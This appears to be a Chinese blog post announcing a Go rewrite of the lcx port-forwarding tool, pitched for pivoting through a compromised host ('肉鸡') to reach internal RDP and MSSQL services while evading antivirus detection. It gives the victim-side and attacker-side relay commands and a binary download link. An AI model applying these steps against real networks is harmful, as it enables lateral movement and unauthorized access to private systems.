经常有朋友用lcx的,但是由于很多原因可能都不好使,例如 :
1.linux下能用lcx,有时只能拿msf出来。(golang的程序跨平台,甚至嵌入式linux都支持。)
2.不免杀 (基本上目前golang 语言不会被当病毒)
3.每次内网要从新连接其他主机时候,必须从进去从新敲打命令 ,操作过多任意被发现。(肉鸡只用操作一次,其他都交给主控端操作了)
最近正好都碰上了,于是自己写了一个。
运行如下:
现借下列场景展开介绍:
介绍:
以上IP拓扑如上,内网私有,外网无法直接访问内网任意主机,其中A已经控制了B。
目的:
攻击者A想通过B 连接内部任意计算机(如远程桌面,数据库)
要求:
攻击者A 已经控制B,并远程桌面内部其他机器C和其他机器。
操作:
首先, 在B上面敲打:
lcx 111.13.100.92 123
其次剩下的都在A上敲打:
假如 A 想连接内网 C 的远程桌面,在A上敲:lcx 456 123 192.168.10.3 3389
这时候 A 只用连接本机的456端口就等于连接内网的3389了。
假如A 想还想连接内网其他机器的mssql (假设IP地址为192.168.10.55):
这时候B不用管,只用在A上敲:lcx 1433 123 192.168.10.55 1433
暂时提供windows版本下载:
http://download.csdn.net/detail/yatere/8642431